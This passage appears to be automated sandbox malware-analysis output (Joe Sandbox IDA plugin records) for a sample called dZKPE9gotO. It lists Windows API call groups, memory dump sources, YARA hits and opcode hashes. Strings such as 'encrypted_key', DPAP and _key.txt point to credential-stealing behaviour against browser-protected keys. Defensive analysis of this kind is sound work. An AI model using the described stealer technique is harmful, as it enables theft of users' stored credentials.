                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(EC8350EC), ref: 0040AF18
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040AF1F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2311089104-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CreateFileA.KERNEL32 ref: 0040AEA5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CloseHandle.KERNEL32(00000000), ref: 0040AF1F
                                                                                                                                                                                                                                                    • Part of subcall function 00414B34: LocalAlloc.KERNEL32(00000040,?,?,?,00000000,0040B194,?,?,?,?,?,?,?), ref: 00414B4F
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,-00000010,00643AC3,?,?,?,?), ref: 0040B2A4
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$AllocLocal$CloseCreateHandleReadSizelstrcpylstrlen
                                                                                                                                                                                                                                                  • String ID: $"encrypted_key":"$DPAP$_key.txt
                                                                                                                                                                                                                                                  • API String ID: 82890309-3678897400
                                                                                                                                                                                                                                                  • Opcode ID: 560c7af5f50cd41879125780b016164bba3ba7196f9a72ca2fff042b5dae2ad0
                                                                                                                                                                                                                                                  • Instruction ID: 200056ac7e48790ee9f9f958e2c71caa17006c645cadd2adf35f82bbd2b34129
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 560c7af5f50cd41879125780b016164bba3ba7196f9a72ca2fff042b5dae2ad0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F5127719403599BDB10DFB5DC49AEE77B6FF05308F08016EE890A7291D7389984CBD9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1274457161-0
                                                                                                                                                                                                                                                  • Opcode ID: c09bd2fe11c1348f47e017cb7b041520fc743fed67941c6b7e3336a6be8fbed0
                                                                                                                                                                                                                                                  • Instruction ID: 9d1ca6733fe292c31276a17a668bcecf696b10a7d1d66101ed332df4bee839c5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c09bd2fe11c1348f47e017cb7b041520fc743fed67941c6b7e3336a6be8fbed0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D11E1F2A002549FD700EF25AC417993BE5AB95315F19403EF809D7341E779DA428BA6
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1274457161-0
                                                                                                                                                                                                                                                  • Opcode ID: 38a59c435b2d45f420b464d8d40ae8dc3af5eaaf409ae4e48b30047349412896
                                                                                                                                                                                                                                                  • Instruction ID: 80d2045ad2f8593c330baddbf277162730afe79b108fe80333406e261d85fc85
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38a59c435b2d45f420b464d8d40ae8dc3af5eaaf409ae4e48b30047349412896
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D01A5F1A002489FD700EF25EC41BAE77E8EB99709F11402EF809D7341D774DA058B66
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0041A92E
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00407382: lstrlenA.KERNEL32(00000000,?,?,?,?,?), ref: 004073FA
                                                                                                                                                                                                                                                    • Part of subcall function 00407382: StrCmpCA.SHLWAPI(?,0042EEFC,0042EEFC,0042EEFC,0042EEFC,?,?,00000000,00000000), ref: 00407449
                                                                                                                                                                                                                                                    • Part of subcall function 00407382: InternetOpenA.WININET ref: 0040747C
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?), ref: 0041A9F9
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcpylstrlen$InternetOpen
                                                                                                                                                                                                                                                  • String ID: ERROR
                                                                                                                                                                                                                                                  • API String ID: 3860179324-2861137601
                                                                                                                                                                                                                                                  • Opcode ID: 9db7e4bd71a96f2ad96fee4485a029e76f8f81f0a0a3d14fd4dcbb05e52f5b74
                                                                                                                                                                                                                                                  • Instruction ID: 280cb0089ae8515307c330337300684973a3070d8c525834bcac429b90799bd2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9db7e4bd71a96f2ad96fee4485a029e76f8f81f0a0a3d14fd4dcbb05e52f5b74
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 593152B5D012099FCB01EF65C982ADEBBF5BF08314F00451AE815A7291DB34BA95CF95
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A27
                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001A90D,?,00000000,00000000), ref: 00417A79
                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,004017BD,?), ref: 00417A85
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateObjectSingleSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 309549813-0
                                                                                                                                                                                                                                                  • Opcode ID: d452bcfcc1377c3e87c60ca12b82fb9f930b46db966c0f9d46f134da2ab8ecc5
                                                                                                                                                                                                                                                  • Instruction ID: ea3f199f5e230162cc47f9fcea8af2023e6e25e0fd3ef7ab80fb325c08834ad3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d452bcfcc1377c3e87c60ca12b82fb9f930b46db966c0f9d46f134da2ab8ecc5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 634150B92143048FC705EF65D8869EE77EABF85345F00882EF855C3291DF389A48CBA5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,00412594,?,?,?,?,?,00643EC0,004124C3,?,004098D5,?,00000000,004035A3), ref: 004125F8
                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,00412594,?,?,?,?,?,00643EC0,004124C3,?,004098D5,?,00000000,004035A3), ref: 00412614
                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0041261F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ??2@$Concurrency::cancel_current_task
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 286195125-0
                                                                                                                                                                                                                                                  • Opcode ID: c534c63760d1d932dc7fddc2ea44355ac0d26d12e54a6b122f5046b95e2529f8
                                                                                                                                                                                                                                                  • Instruction ID: a4ecb42e4321ae6241b5ae991f2ad0685b404bdca419ecb083382337115b196c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c534c63760d1d932dc7fddc2ea44355ac0d26d12e54a6b122f5046b95e2529f8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAE08CF3A0111016CA14A2B0AE4AA4FA0885BB4324B04893BB41AD26E4EA7CD5E0C56E
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,0040128A,?,004315E7,?,004315DB,?,004315E4,?,004315E1,?,004315DE,?,004315DB), ref: 00413DC2
                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,0040128A,?,004315E7,?,004315DB,?,004315E4,?,004315E1,?,004315DE), ref: 00413DD1
                                                                                                                                                                                                                                                  • GetComputerNameA.KERNEL32(00000000), ref: 00413DDF
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4203777966-0
                                                                                                                                                                                                                                                  • Opcode ID: e87addc3917c1582652ae1521c80a92d529d285b71a0c17ec3e8cc84417c586a
                                                                                                                                                                                                                                                  • Instruction ID: f11edcf30a3937a6bf13aa21ee565a1a4d2718e968f7f5cc493714258eaccb72
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e87addc3917c1582652ae1521c80a92d529d285b71a0c17ec3e8cc84417c586a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AD017B17003206FE6209B2ABC0CF873AACEFC9B61B990070FC05C3250D3348846C6A9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1103761159-0
                                                                                                                                                                                                                                                  • Opcode ID: 5ee9d7473c3924204ca57906dc96219f516d74c2ff55c0a1b6b29943125a55b7
                                                                                                                                                                                                                                                  • Instruction ID: cbeecf13432bd86b07881f9954f5d2781a3b91bd5f6aa0d8a48ab97a10eed13d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ee9d7473c3924204ca57906dc96219f516d74c2ff55c0a1b6b29943125a55b7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EE0B6709087408AE310BF789A09329BAF0BB54702F80467AEC8591165EB7845998A9B
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32 ref: 00401024
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040104A
                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 00401064
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Virtual$AllocFreememset
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3122926387-0
                                                                                                                                                                                                                                                  • Opcode ID: a0a013b6774e571c5b65a47fc1d3d360eda1f497b9a4925a01a31c340fd8a1f6
                                                                                                                                                                                                                                                  • Instruction ID: 953efe50e1cbbb812f06cc3e62367a8be46cf4bdbcb976bc8bbce204aaafe815
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0a013b6774e571c5b65a47fc1d3d360eda1f497b9a4925a01a31c340fd8a1f6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4DF0273268267467E12032383C09FBBA398AF02B54F905136FD84F32A1E651595541E8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A2A36E
                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 00A2A38E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205131048.0000000000A29000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A29000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a29000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                  • Instruction ID: 6a2ad3c4d83ee4eea28b7998455e57919677156b49dcdff4fa656b2770428dac
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5F0C239600720AFD7207BF9A88DA6E76E8BF58720F100138F646950C0CB70E8454662
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000400,?,?,009B0223,?,?), ref: 009B0E19
                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,009B0223,?,?), ref: 009B0E1E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                  • Instruction ID: 834e71a4ee2bb256775d8f514e505c58297908d8ee81c6856434322e2576a7f4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31D01232245228B7DB002AD4DC09BCEBB1CDF09BA2F008421FB0DE9080CBB09A4046EA
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00414B18
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1699248803-0
                                                                                                                                                                                                                                                  • Opcode ID: ab4a8321712fcc922be74a85797a0249bd995a8b6693096a5be71d41bf5f0982
                                                                                                                                                                                                                                                  • Instruction ID: 2708b0e3243a0e957b98e2de8dbff298e4be506c05b60b3b5688325687bc23d0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab4a8321712fcc922be74a85797a0249bd995a8b6693096a5be71d41bf5f0982
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22F065F56042406FE3109B29DC84D7BBBECEBC8755F00882CF9C897341D6349D15C6A1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,?,?,00401F5C,?,00000000,?,0042EEFC), ref: 00414AC8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                  • Opcode ID: e7eeef91b189e3eb156169286097dafbbf83a662e1d22db4b58308e2dade1027
                                                                                                                                                                                                                                                  • Instruction ID: 9a9555821b1b5639991f33a0d047dc28d6ef73e7f338c8467c625410a53c9249
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7eeef91b189e3eb156169286097dafbbf83a662e1d22db4b58308e2dade1027
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8D0A7BB70172A4B5B006EAA1C55CCF530EEFC029A301043FF50093150CA145E0A46A5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00A2A056
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205131048.0000000000A29000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A29000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a29000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                  • Instruction ID: 826d0641de8a8984e9bd87409c8158ab794cbf5a6ca53303a7fc9c7ab5b71ce3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A113C79A00208EFDB01DF98CA85E98BBF5AF08750F0580A4F9489B362D371EA50DF81
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,0040B194,?,?,?,?,?,?,?), ref: 00414B4F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3494564517-0
                                                                                                                                                                                                                                                  • Opcode ID: 0c83796e71d9fd92b85acab00c076ac88b98b03ee52731056f74553e5987f3df
                                                                                                                                                                                                                                                  • Instruction ID: c5585fe1be56caf24d44a51d4f7cb6acd98d7c2f993cc92adb08f3e4ce33ffd0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c83796e71d9fd92b85acab00c076ac88b98b03ee52731056f74553e5987f3df
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61E0D87630D3924B97608EA854C0FA7A79CABD9F41B0A006EFA44D7301D650EC45C778
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,?,00000031,?,?,009CB2B7,0042EEFC,0042EEFC,0042EEFC), ref: 009CCE10
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,009CB2B7,0042EEFC,0042EEFC,0042EEFC), ref: 009CCE21
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,009CB2B7,0042EEFC,0042EEFC,0042EEFC), ref: 009CCE32
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,009CB2B7,0042EEFC,0042EEFC,0042EEFC), ref: 009CCE43
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,009CB2B7,0042EEFC,0042EEFC,0042EEFC), ref: 009CCE54
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,009CB2B7,0042EEFC,0042EEFC,0042EEFC), ref: 009CCE65
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,009CB2B7,0042EEFC,0042EEFC,0042EEFC), ref: 009CCE76
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,009CB2B7,0042EEFC,0042EEFC,0042EEFC), ref: 009CCE87
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FE4), ref: 009CCEDD
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCEF4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCF0B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCF22
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCF39
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FE8), ref: 009CCF58
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCF6F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCF86
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCF9D
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCFB4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCFCB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCFE2
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCFF9
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FEC), ref: 009CD014
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD02B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD042
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD059
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD070
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FF0), ref: 009CD08F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD0A6
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD0BD
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD0D4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD0EB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD102
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FF8), ref: 009CD121
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD138
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD14F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD166
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD17D
